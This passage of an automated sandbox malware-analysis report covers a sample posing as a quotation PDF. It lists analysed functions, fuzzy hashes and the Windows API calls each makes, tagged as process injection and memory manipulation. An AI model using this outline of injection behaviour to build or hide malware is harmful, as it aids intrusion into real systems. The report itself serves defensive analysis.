Instruction Fuzzy Hash: 3AA17C76B01219CFCF06DFA4C8405EEB7F6FF85300B15466AE805AB225DB35E946CB50

Function 0A08B2BC Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1723179639.000000000A080000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a080000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 426a40cc216376d2de1db241248dcc21764ba2ec3272a78b21d3cd9c41b2f705
Instruction ID: 595d1656b01b3b1cdd63b90ba8949e41a0052887621109429e19c92dc52375bb
Opcode Fuzzy Hash: 426a40cc216376d2de1db241248dcc21764ba2ec3272a78b21d3cd9c41b2f705
Instruction Fuzzy Hash: 0F910971E106198FDB54DF69C88069DF7F1BF88304F2482AAE459EB351EB71A981CF40

Function 0A08CF30 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1723179639.000000000A080000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a080000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b2f189a22a7a847139be0036f5402db6572294a8771cdb870ad9ed7086fe62b
Instruction ID: 94f14f6ff0f24ef7c10a1c13385994ad342c5a05273e1403a05938dabd57166e
Opcode Fuzzy Hash: 1b2f189a22a7a847139be0036f5402db6572294a8771cdb870ad9ed7086fe62b
Instruction Fuzzy Hash: 98912B71E106198FCB54DF68C880A9DF7F1BF89304F2482AAE459EB351EB31A981CF40

Function 018C5908 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c76f41922d9b2a42b71685e845a9e5740d7760810347fae9892b38f8b2bc15d3
Instruction ID: fcfcfa73b0cf9374bba55bbec994d685a801c50298959a98f42e5dd37518104b
Opcode Fuzzy Hash: c76f41922d9b2a42b71685e845a9e5740d7760810347fae9892b38f8b2bc15d3
Instruction Fuzzy Hash: F1812370E152098FCF04CFA9D5804DEFBF2BF8A760F24946AD045FB224D734AA068B25

Function 0A1B2C68 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35f6a0c6b10fa33b50dde29576754ab1221aedcd16df3b632165381416fd018e
Instruction ID: 7cd53edace3c8880397f61b11ee03609394075ec3552c77fa53a8162015e4221
Opcode Fuzzy Hash: 35f6a0c6b10fa33b50dde29576754ab1221aedcd16df3b632165381416fd018e
Instruction Fuzzy Hash: E36108B4D15209DFDB28CFA9D444AEEBBBAFF4A300F109029E419B7255D734994ACF50

Function 018C5918 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 485b462c597ef9a66b1e7ec9ada58ac59c63c713f0d3dc104b495175e3ccfdac
Instruction ID: ca9a7c6442a87fb059b39d1a3ea3e4db5d951c3bebddfa401c3726c5f526f8fe
Opcode Fuzzy Hash: 485b462c597ef9a66b1e7ec9ada58ac59c63c713f0d3dc104b495175e3ccfdac
Instruction Fuzzy Hash: F7711374E152098FCF04CFA9D5805DEFBF2BF89760F24A46AD045FB224D734AA428B65

Function 018C8838 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0449c4fc271ce008edca14f130bd52ce1be6b49973f719ac10d6155fff7dd51d
Instruction ID: 075424547368e64c84222f195b220248d277767ee30ee460d29ea38987855acb
Opcode Fuzzy Hash: 0449c4fc271ce008edca14f130bd52ce1be6b49973f719ac10d6155fff7dd51d
Instruction Fuzzy Hash: A0612A74E052299FDB14CFA9D980AAEFBB2FB89300F24C16AD509E7355D7309A41CF61

Function 0A1BB00E Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f0ddaa53ffa61744faad66e88f805d819a728fd6b7d2e09f02d8a52b25b1c6a
Instruction ID: 3b427f606612ac874959a16f8eccf9ab701b3695ad2f4332d7944278721c86c3
Opcode Fuzzy Hash: 5f0ddaa53ffa61744faad66e88f805d819a728fd6b7d2e09f02d8a52b25b1c6a
Instruction Fuzzy Hash: 45513A70E142598FCB15CFA9C9905EEBBF2BF89304F2581AAD458AB316D7309D42CF61

Function 018C8828 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d45d12afa89be168ac410b2204bebf16f255fdece08c94afbe93de3810116bc1
Instruction ID: f80334e9c74d694283e048ba62a03fa8c4b9bb825686410cb48c122e1981bae3
Opcode Fuzzy Hash: d45d12afa89be168ac410b2204bebf16f255fdece08c94afbe93de3810116bc1
Instruction Fuzzy Hash: 96611970E152299BDB14CF69D980AAEFBB2FF89300F24C16AD509E7355D7309A41CF61

Function 018C5DC8 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca4341b972123e3355a29b43a87ee1891eea03ec024f91e5630835f4c148f7b7
Instruction ID: ce0d35a59dcf7d6bdf0f6687c7b7abe4187b375796450a89d6c6eed0f12f062d
Opcode Fuzzy Hash: ca4341b972123e3355a29b43a87ee1891eea03ec024f91e5630835f4c148f7b7
Instruction Fuzzy Hash: 5C415E71E116588BEB28CF6B894479EFBF3AFC9300F14C1BA954CA6225DB305A458F51

Function 0305DE68 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe32c4dbe1b744b7dc534286e0df8c5ff3acd8ecd2442b205eef0814faaa338a
Instruction ID: 61e45ff31e5400553f510eeaec4e59714ba7fa2dc06d1987af82606e14626dd3
Opcode Fuzzy Hash: fe32c4dbe1b744b7dc534286e0df8c5ff3acd8ecd2442b205eef0814faaa338a
Instruction Fuzzy Hash: 1F31BAB5D012089FCB14CFA9D984A9EFBF1AB49310F24902AE808B7210D734A945CF54

Function 0305C36C Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6369ed4bd208ca2f15d2b17c21b61579ed54189563bb1cfd72140926c703555a
Instruction ID: 34df37d2073126b4c16abd90728b0d0d4712614cb37f5c87fcf5032265e6a803
Opcode Fuzzy Hash: 6369ed4bd208ca2f15d2b17c21b61579ed54189563bb1cfd72140926c703555a
Instruction Fuzzy Hash: 153199B4D052589FCB14DFA9E984ADEFBF1EB49310F24902AE808B7310D774A945CF94

Function 018C9870 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cccebea8eba271d191bbd618487bc43f494caaca95dfadaa3508c1c41890906c
Instruction ID: 88730276e9854134edc84713b1d972fd2a42144882240f2887e7f804535ee737
Opcode Fuzzy Hash: cccebea8eba271d191bbd618487bc43f494caaca95dfadaa3508c1c41890906c
Instruction Fuzzy Hash: 892128B0E11219DBDB18DFAAD8417AEFBB7ABC8714F14C0AAD508A7254DB308A418F51

Function 018C9860 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27a1bd8830f1409f86d7ee051142056f29d302dd0e74309c529dc300b97facd2
Instruction ID: 84f7dafe86904e5bc661d070ede02762f56cb68c18d09781a152e6f18c6c0a55
Opcode Fuzzy Hash: 27a1bd8830f1409f86d7ee051142056f29d302dd0e74309c529dc300b97facd2
Instruction Fuzzy Hash: FE213D70E112599BDB18CF6BD8406AEFBF3AFC9704F14C4AAD908E7354DB314A458B51

Function 018C08D8 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e22f265c8da80eea603ac24e2698aeef946bb2e2f1a3804a0d23af72b247c01d
Instruction ID: 63ddde0bcdbffbfa7cca2c86c95dbfb96c0f73402b98e615d832abe512efb107
Opcode Fuzzy Hash: e22f265c8da80eea603ac24e2698aeef946bb2e2f1a3804a0d23af72b247c01d
Instruction Fuzzy Hash: DE21ED71E056189BEB18CF6B98447DEFBF3AFC8314F08C17AD908A6224EB3546568F51

Analysis Process: mexnJkivovwH.exePID: 7908, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	14.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	261
Total number of Limit Nodes:	21

Executed Functions

Function 00A707F4 Relevance: 1.6, APIs: 1, Instructions: 103nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 00A7980D

Memory Dump Source

Source File: 00000009.00000002.1748567440.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a70000_mexnJkivovwH.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 21cb29263d5f0d418ea2a5f543f817e2b2b7adc4157ba9448215d79487697700
Instruction ID: 18d9c267c33f982a29223f3349430bef5063f7656edd74c56a21278a0e85a8de
Opcode Fuzzy Hash: 21cb29263d5f0d418ea2a5f543f817e2b2b7adc4157ba9448215d79487697700
Instruction Fuzzy Hash: CC4157B9D042589FCF10CFAAD984ADEFBB5BB19310F10A02AE918B7310D375A945CF65

Function 00A79751 Relevance: 1.6, APIs: 1, Instructions: 101nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 00A7980D

Memory Dump Source

Source File: 00000009.00000002.1748567440.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a70000_mexnJkivovwH.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 3fed1d9f12d34cfb861790c7655043e2159c2763e22f7196f5f7043ca9513979
Instruction ID: 76f598f9d6fbfd4917ad5fa0a4e0fd4168d2a81fe2df01b72375ad478af94318
Opcode Fuzzy Hash: 3fed1d9f12d34cfb861790c7655043e2159c2763e22f7196f5f7043ca9513979
Instruction Fuzzy Hash: EF4169B9D042589FCF14CFA9D984ADEFBB1BB1A310F10902AE818B7350D375A945CF65

Function 08F3E214 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 325
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08F3E4E7

Strings

6 , xrefs: 08F3E626
6 , xrefs: 08F3E561
6 , xrefs: 08F3E43A

Memory Dump Source

Source File: 00000009.00000002.1755836099.0000000008F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8f30000_mexnJkivovwH.jbxd

Similarity

API ID: CreateProcess
String ID: 6 $6 $6
API String ID: 963392458-1352605413
Opcode ID: 8b5974545a426243c776a610bf8afbccd0add2c42f83d6923f4eb2671e4c9b6b
Instruction ID: 87a2dd3936df90de64b623006f377e75dc5bf6bb7e105b6d2c4c77cb6c1c1ccc
Opcode Fuzzy Hash: 8b5974545a426243c776a610bf8afbccd0add2c42f83d6923f4eb2671e4c9b6b
Instruction Fuzzy Hash: 76C137B1D00229CFDB24CFA8C845BEEBBB1BF49301F0095AAD459B7640DB749A85CF95

Function 08F3E220 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 321
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08F3E4E7

Strings

6 , xrefs: 08F3E626
6 , xrefs: 08F3E561
6 , xrefs: 08F3E43A

Memory Dump Source

Source File: 00000009.00000002.1755836099.0000000008F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8f30000_mexnJkivovwH.jbxd

Similarity

API ID: CreateProcess
String ID: 6 $6 $6
API String ID: 963392458-1352605413
Opcode ID: 8cbaba233f1c5f4dd6f21229752ccfd93c76f18f73210b665880e3eb6b2cde5d
Instruction ID: 8ed5eb21c7d1626aa89e91cfa83a7ffc91e2d0a06b415f60c508dfe9fe12c0a6
Opcode Fuzzy Hash: 8cbaba233f1c5f4dd6f21229752ccfd93c76f18f73210b665880e3eb6b2cde5d
Instruction Fuzzy Hash: DAC106B1D00229CFDB24CFA8C845BEEBBB1BF49301F0095AAD459B7640DB749A85CF95

Function 023F8628 Relevance: 6.1, APIs: 4, Instructions: 138
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 023F86B6
GetCurrentThread.KERNEL32 ref: 023F86F3
GetCurrentProcess.KERNEL32 ref: 023F8730
GetCurrentThreadId.KERNEL32 ref: 023F8789

Memory Dump Source

Source File: 00000009.00000002.1748869855.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_23f0000_mexnJkivovwH.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 7bd9a21c3e85e8c48e2234a66d191078ff7b30957668ec3bd214f08162d81e86
Instruction ID: 32d80b1be221fd87eea0978a01da2e056c8512abbe1a6c7f3de2cbc904d7bc44
Opcode Fuzzy Hash: 7bd9a21c3e85e8c48e2234a66d191078ff7b30957668ec3bd214f08162d81e86
Instruction Fuzzy Hash: 0E5199B0901349CFDB48DFAAE948BEEBBF2EF48314F208459E109A7361D7345948CB65

Function 023F8638 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 023F86B6
GetCurrentThread.KERNEL32 ref: 023F86F3
GetCurrentProcess.KERNEL32 ref: 023F8730
GetCurrentThreadId.KERNEL32 ref: 023F8789

Memory Dump Source

Source File: 00000009.00000002.1748869855.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_23f0000_mexnJkivovwH.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: ab3833ac3397fb9baf0365d59540e434eaa9c8e7924ab98d08ee1c70fcd3d7e7
Instruction ID: 9f2f5fe37fa58179a0f3219c666b7ffddaff535959084d5f757a04a372f5041f
Opcode Fuzzy Hash: ab3833ac3397fb9baf0365d59540e434eaa9c8e7924ab98d08ee1c70fcd3d7e7
Instruction Fuzzy Hash: B55156B0901349CFDB58DFAAD948BAEBBF2EF88314F208459E109A73A0D7345944CF65

Function 023FC658 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 327
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 023FD0F1

Strings

0, xrefs: 023FD0C7
Crp^, xrefs: 023FC7B1

Memory Dump Source

Source File: 00000009.00000002.1748869855.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_23f0000_mexnJkivovwH.jbxd

Similarity

API ID: CreateWindow
String ID: 0$Crp^
API String ID: 716092398-3462751211
Opcode ID: 4086f1103428ea99bd94f80499f4d05154d8b992452689744545df7beb40113b
Instruction ID: e40a8348ddf412f6eb80899311ab57d9eca507e58a7a5498cda925fa552435ff
Opcode Fuzzy Hash: 4086f1103428ea99bd94f80499f4d05154d8b992452689744545df7beb40113b
Instruction Fuzzy Hash: 3EC12A74A007199FCB54DFA9D884A9EBBF2FF88300F10896AD50ADB351DB74A945CF90

Function 00A781A0 Relevance: 1.9, APIs: 1, Instructions: 438memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 00A7850F

Memory Dump Source

Source File: 00000009.00000002.1748567440.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a70000_mexnJkivovwH.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ca3f48328df076438a47191f131cfcbe24712e8864792c840502e3f74cd740a4
Instruction ID: 08fb7685490dd17a52e87d8d3a13ba815377c8372f7d6bb0953c5f5df6621fcc
Opcode Fuzzy Hash: ca3f48328df076438a47191f131cfcbe24712e8864792c840502e3f74cd740a4
Instruction Fuzzy Hash: 3AD1C16594EBC89FCB128B74CE6A198BFB1BE12214F09C4EFC89417D93D6680497CB43

Function 023F6250 Relevance: 1.7, APIs: 1, Instructions: 227COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(?), ref: 023F64D2

Memory Dump Source

Source File: 00000009.00000002.1748869855.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_23f0000_mexnJkivovwH.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: aefff3340e093f11449f1d1ca6e0ec9a717a933a962666e02d8dd8ae52635228
Instruction ID: 3766472f2223918198b7a5a7762ea06d014b7573a824990ae54bd329d22d8dfc
Opcode Fuzzy Hash: aefff3340e093f11449f1d1ca6e0ec9a717a933a962666e02d8dd8ae52635228
Instruction Fuzzy Hash: 7D913370A00B198FCB64CF69E54579ABBF6FF48304F00892AE55AE7A50D730E945CF90

Function 023F001C Relevance: 1.6, APIs: 1, Instructions: 145COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 023F0131

Memory Dump Source

Source File: 00000009.00000002.1748869855.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_23f0000_mexnJkivovwH.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: db19ae35395888d8ceeec611c2ba878e2fb1875bac1559263d1aa6713c215328
Instruction ID: ebeefbfdba22904dcae45376eaf6261bc9cb48612c447157325e9fb471d2d97d
Opcode Fuzzy Hash: db19ae35395888d8ceeec611c2ba878e2fb1875bac1559263d1aa6713c215328
Instruction Fuzzy Hash: 63511AB4D043598FDB21CFA8C845BDEBBF5AF46300F1080AAD549AB252DB716949CF91

Function 023F0040 Relevance: 1.6, APIs: 1, Instructions: 123COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 023F0131

Memory Dump Source

Source File: 00000009.00000002.1748869855.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_23f0000_mexnJkivovwH.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: dac0b74e7a851d8fa6e97f49e545794cafa7bceb5dd493cc1732889ecd117cab
Instruction ID: 6370979a0d9871d4eb1e5db7b02b38fd263ec393443761c6a830559048e8dafa
Opcode Fuzzy Hash: dac0b74e7a851d8fa6e97f49e545794cafa7bceb5dd493cc1732889ecd117cab
Instruction Fuzzy Hash: F351E5B4D002198FDB24DFA8C845BDEBBF5AF49300F1080AAD509BB251DB716A89CF91

Function 08F3DE91 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08F3DF6B

Memory Dump Source

Source File: 00000009.00000002.1755836099.0000000008F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8f30000_mexnJkivovwH.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: f08e757a2710e68d2aaaf139f8d18893c86153f2d60c0fb5fab7208d83505736
Instruction ID: ecc97cc41862fdf9f6f89328f776c3d7b92afbd509804397711a2b36b3bd82da
Opcode Fuzzy Hash: f08e757a2710e68d2aaaf139f8d18893c86153f2d60c0fb5fab7208d83505736
Instruction Fuzzy Hash: 564199B5D012589FCB00DFA9D984AEEFBF1BF49310F24902AE419B7250D735AA46CF64

Function 08F3DE98 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08F3DF6B

Memory Dump Source

Source File: 00000009.00000002.1755836099.0000000008F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8f30000_mexnJkivovwH.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 40f267123cca6ab138eb296d490dc0d03a7dc0aa8c6d19b9efdd06546dc89a92
Instruction ID: 7f4e4f6ac4a0a90483c2060079bb98ac7463f495ff754d2252f2c2b31833198e
Opcode Fuzzy Hash: 40f267123cca6ab138eb296d490dc0d03a7dc0aa8c6d19b9efdd06546dc89a92
Instruction Fuzzy Hash: 9A4198B5D012589FCF00DFA9D984AEEFBF1BB49310F20902AE818B7250D735AA45CF64

Function 023F887B Relevance: 1.6, APIs: 1, Instructions: 112COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 023F894B

Memory Dump Source

Source File: 00000009.00000002.1748869855.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_23f0000_mexnJkivovwH.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f2e8ca85dca224b2e68735160a79021e9a3b278980b1b8d492deb9845b3732b6
Instruction ID: b91b7021391476e89c3d5eac8e2d2210dcd058fa9bf2446b5066cc154bf73f46
Opcode Fuzzy Hash: f2e8ca85dca224b2e68735160a79021e9a3b278980b1b8d492deb9845b3732b6
Instruction Fuzzy Hash: 7E4166B9D002589FCB10CFA9D984ADEBBF5BB09310F14906AE958BB311D335A985CF54

Function 08F3DFE8 Relevance: 1.6, APIs: 1, Instructions: 109COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08F3E0A2

Memory Dump Source

Source File: 00000009.00000002.1755836099.0000000008F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8f30000_mexnJkivovwH.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 41685142f57911fc445cba7282732a0575f7feff4e04d3295555abfcebe5a8db
Instruction ID: 0a3d02e0dbf56fa178195843f39d82698135238de561d59fd674f6637749d341
Opcode Fuzzy Hash: 41685142f57911fc445cba7282732a0575f7feff4e04d3295555abfcebe5a8db
Instruction Fuzzy Hash: 8041B9B9D042589FCF10CFA9D884AEEFBB1BF49310F10942AE819B7240D735A946CF64

Function 023F8880 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 023F894B

Memory Dump Source

Source File: 00000009.00000002.1748869855.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_23f0000_mexnJkivovwH.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 06310f92331df0a2870c033ae5c9e75afc46f66804d7c19688d401876b760ef1
Instruction ID: f48964772806d4750dec4dc2a8b121f22b5f9977052d903b315cdd55437e863b
Opcode Fuzzy Hash: 06310f92331df0a2870c033ae5c9e75afc46f66804d7c19688d401876b760ef1
Instruction Fuzzy Hash: A04164B9D002589FCB10CFA9D984ADEBBF5BB09310F14906AE918BB310D335A945CF54

Function 08F3DD70 Relevance: 1.6, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08F3DE22

Memory Dump Source

Source File: 00000009.00000002.1755836099.0000000008F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8f30000_mexnJkivovwH.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6e9201f86f8cbc60966457e9fac21eb397c22ab0978c336fa92df6c1a3900d62
Instruction ID: 97f9f03757fed0eda1d226a60c4f1e8b88a015198044b9cfae7a04d082a96f61
Opcode Fuzzy Hash: 6e9201f86f8cbc60966457e9fac21eb397c22ab0978c336fa92df6c1a3900d62
Instruction Fuzzy Hash: 6241C8B9D042589FCF10DFA9D884ADEFBB1FB59310F10942AE815B7210D735A946CF64

Function 08F3DFF0 Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08F3E0A2

Memory Dump Source

Source File: 00000009.00000002.1755836099.0000000008F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8f30000_mexnJkivovwH.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: b77cbafdf321356957efec86b3db18f8b010d6f867f18f57c6d4afca16819adc
Instruction ID: bd89798e1b3206337937918fab4a8e4f2e90213cb699fba202ba251d57184f38
Opcode Fuzzy Hash: b77cbafdf321356957efec86b3db18f8b010d6f867f18f57c6d4afca16819adc
Instruction Fuzzy Hash: 9D4188B5D042589FCF10DFAAD984AEEFBB1BF49310F10942AE815B7240D735A945CF64

Function 08F3DD78 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08F3DE22

Memory Dump Source

Source File: 00000009.00000002.1755836099.0000000008F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8f30000_mexnJkivovwH.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
